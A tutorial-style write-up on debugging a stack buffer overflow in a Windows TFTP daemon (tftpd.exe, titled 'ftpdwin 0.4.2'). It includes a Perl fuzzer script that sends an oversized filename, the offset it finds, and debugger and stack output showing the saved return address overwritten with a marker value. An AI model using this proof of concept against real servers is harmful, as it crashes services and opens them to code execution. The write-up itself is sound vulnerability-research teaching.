Debug in ftpdwin 0.4.2
writer: demonalex[at]dark2s[dot]org
I remember having seen some information about an overflow in ftpdwin (version 0.4.2), but the details have faded from memory, so I wanted to work out for myself how to overflow that baby... The tools: IDA, OllyDbg, WinDbg, and so on.
1) First, open the binary in IDA, create a *.MAP file and export it. Attach OllyDbg to tftpd.exe, import the MAP file into OllyDbg, and press F9 to run.
2) Now we must find how much filler it takes to reach the saved return address. How? Write a Perl fuzzing script named fuzzer.pl with this content:
*********************************************************
#!/usr/bin/perl -w
# fuzzer.pl: send one TFTP read request whose filename is an oversized string
use strict;
use Net::TFTP;
$| = 1;
my $target_ip = shift
    or die("usage: $0 target_ip\n");
##################################
#expcode:
my $buffer  = "\x41" x 500;   # length of useless buffer (filler)
my $expcode = $buffer;        # the filename field of the RRQ carries the overflow
##################################
my $tftp = Net::TFTP->new($target_ip, BlockSize => 1024);
$tftp->octet;                 # binary mode, so nothing is translated on the way
$tftp->get($expcode)          # RRQ for a file named $expcode; the daemon copies it
    or warn "get failed: ", $tftp->error, "\n";   # no reply once it has crashed
exit 1;
*********************************************************
500 bytes? Wrong... EIP is not 0x41414141. How about 400 bytes? Of course it is not 400 either. But let us look at the contents of the stack:
00F5F174 00000000
00F5F178 00406437 RETURN to tftpd.00406437 from <jmp.&msvcrt.strcpy>
00F5F17C 00F5F19C
00F5F180 41414141
00F5F184 00000080
00F5F188 00240000
00F5F18C 00000001
Our request has been through a strcpy. In OllyDbg, Ctrl+G goes to 00406437 (the address that strcpy returns to) and F2 sets a breakpoint there.
3) Attach WinDbg to tftpd.exe and brute-force the length until EIP equals 0x41414141: the length is 288 (RET included), i.e. 284 bytes of filler followed by the 4 bytes that land in EIP.
4) Change the expcode in fuzzer.pl:
##################################
#expcode:
my $buffer  = "\x41" x 284;          # filler up to the saved return address
my $ret     = "\x44\x43\x42\x41";    # marker RET, little-endian: pops into EIP as 0x41424344
my $expcode = $buffer . $ret;        # 288 bytes in total
##################################
5) Finally, press Ctrl+F2 in OllyDbg to restart tftpd.exe, run the new fuzzer.pl, and stop at our breakpoint (00406437). The code from there on copies the request around with strcat into fixed-size stack buffers ([ebp-228], [ebp-118]) and hands it to GetFullPathNameA; the only length test (cmp eax, 3) decides whether to append a constant string, nothing bounds the copies. See:
00406437 |. 8D85 D8FDFFFF   lea eax, [ebp-228]
0040643D |. 890424          mov [esp], eax
00406440 |. E8 DB650100     call <jmp.&msvcrt.strlen>             ; strlen
00406445 |. 83F8 03         cmp eax, 3
00406448 |. 76 16           jbe short 00406460
0040644A |. C74424 04 5D6>  mov dword ptr [esp+4], 0042655D
00406452 |. 8D85 D8FDFFFF   lea eax, [ebp-228]
00406458 |. 890424          mov [esp], eax
0040645B |. E8 70650100     call <jmp.&msvcrt.strcat>             ; strcat
00406460 |> 8D85 E8FEFFFF   lea eax, [ebp-118]
00406466 |. 894424 04       mov [esp+4], eax
0040646A |. 8D85 D8FDFFFF   lea eax, [ebp-228]
00406470 |. 890424          mov [esp], eax
00406473 |. E8 58650100     call <jmp.&msvcrt.strcat>             ; strcat
00406478 |> 8B45 10         mov eax, [ebp+10]
0040647B |. 05 04010000     add eax, 104
00406480 |. 894424 0C       mov [esp+C], eax
00406484 |. 8B45 10         mov eax, [ebp+10]
00406487 |. 894424 08       mov [esp+8], eax
0040648B |. C74424 04 040>  mov dword ptr [esp+4], 104
00406493 |. 8D85 D8FDFFFF   lea eax, [ebp-228]
00406499 |. 890424          mov [esp], eax
0040649C |. E8 7F6C0100     call <jmp.&KERNEL32.GetFullPathNameA> ; GetFullPathNameA
004064A1 |. 83EC 10         sub esp, 10
004064A4 |. 85C0            test eax, eax
004064A6 |. 75 0C           jnz short 004064B4
004064A8 |. C785 D4FDFFFF>  mov dword ptr [ebp-22C], 0
004064B2 |. EB 0A           jmp short 004064BE
004064B4 |> C785 D4FDFFFF>  mov dword ptr [ebp-22C], 1
004064BE |> 8B85 D4FDFFFF   mov eax, [ebp-22C]
004064C4 |. C9              leave
004064C5 \. C3              retn
Step with F8 from 00406437 down to 004064C5. When you arrive at 004064C5 (the retn), stop and look at the top of the stack:
00F5F3C8 41424344
00F5F3CC 00428B00 tftpd.00428B00
The saved return address has been replaced by our marker, so retn will pop 0x41424344 into EIP. hey hey, you did it~